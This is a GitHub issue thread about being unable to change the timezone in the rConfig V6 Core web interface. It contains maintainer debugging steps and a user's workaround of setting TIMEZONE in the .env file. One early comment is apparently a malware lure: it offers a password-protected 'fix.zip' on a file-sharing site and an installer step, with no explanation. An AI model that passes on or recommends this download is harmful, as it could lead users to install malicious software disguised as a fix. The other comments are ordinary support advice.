### ISSUE TITLE
Can’t change Time zone in V6 Core GUI.

### ISSUE THREAD

**Issue by kfcanete** [rconfig/rconfig#129]
I just installed rConfig V6 Core today on Ubuntu server 24.04 LTS following the steps and guide. However, I am not able change the time zone from Dublin to Pacific time. The drop-down in the web page doesn’t select a new value when clicked. Already set the necessary permissions as indicated on the previous issue raised but still no luck.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by stephenstack** [comment]
I'm sorry we did not get back sooner on this, we have been super busy. Did you get any errors in the UI? or the logs?

Logs Location: /var/www/html/rconfig/storage/logs


Troubleshooting 500 Errors:

Sometimes while using the rConfig UI the browser may respond with a 'Server Error' message. This can lack context and not be specific as to the nature of the problem. If you carry out some advanced troubleshooting, you may find the rConfig server responds to the browser with a 500 or 422 status code, again without a specific error message. This is by design. Take the steps below to get the specific error, and rConfig support will be better able to assist. 



Enable debugging in the .env file
cd /var/www/html/rconfig6/current
vi .env
change 
APP_DEBUG=false
to 
APP_DEBUG=true
save the file, then run the clear command
php artisan rconfig:clear-all
 

Once all of this is completed, hard refresh your browser by typing ctrl+shift+r. Or restart it and login to rConfig again.  The final step is to navigate to the location where you discovered the UI issue or error. Before repeating that error or issue. Open your browsers dev tools. 

 

Google Chrome/ MS Edge:
Console Logs in Chrome:

In Google Chrome, the Console Logs are available as a part of [Chrome Dev Tools](https://developer.chrome.com/docs/devtools/).

To open the dedicated Console panel, either:

Press Ctrl+Shift+J (Windows / Linux) or Cmd+Opt+J (Mac).
Mozilla FireFox:
Console logs in FireFox

In Mozilla FireFox, the Console Logs are available as a part of FireFox [developer tools](https://firefox-source-docs.mozilla.org/devtools-user/index.html).

To [open the Web Console](https://firefox-source-docs.mozilla.org/devtools-user/web_console/ui_tour/index.html):

Either select "Web Console" from the Web Developer submenu in the Firefox Menu (or Tools menu if you display the menu bar or are on Mac OS X)
or press the Ctrl+Shift+K (Command+Option+K on OS X) keyboard shortcut.
 

In the Console Tab, you can find the current error messages (Displayed in Red) along with other console level information such as warnings and info. 



Network Logs in Chrome:

In general, Network panel is used when you need to make sure that resources are being downloaded or uploaded as expected. Open DevTools by pressing Control+Shift+I or Command+Option+I (Mac). Refresh the contents of the webpage.

❗️Alert: It is important to open the Network Tab before performing any action that results in an issue. This is done to properly preserve the network traffic data, one among which could be the error. Alternatively, Reload the page to start getting the logs.


Finding the Error: Scroll through the network logs to find entries with "Red" font, such as the one below:

 
Once you have capture the errors, and details within each of the errors please submit a ticket to support with your findings, and this will help us to quickly identify the issue for you.

At this point you may want to reverse the changes to the .env file.

**Comment by rconfig** [comment]
Hi Any update on this, or can i close it?

**Comment by br-amec** [comment]
@kfcanete I had this exact issue on Ubuntu Server 24.04 LTS. 

The fix for me was to edit the .env file and hard code the Timezone. TIMEZONE=US/Pacific 

![image](https://github.com/user-attachments/assets/5e194004-19c3-42a1-a503-50adbc43f2d9)

**Comment by stephenstack** [comment]
Thanks, @brector-AMEC  its a good workaround. Often the UI cannot make chnages to the .env due to disk permissions issues. Thanks for sharing this.
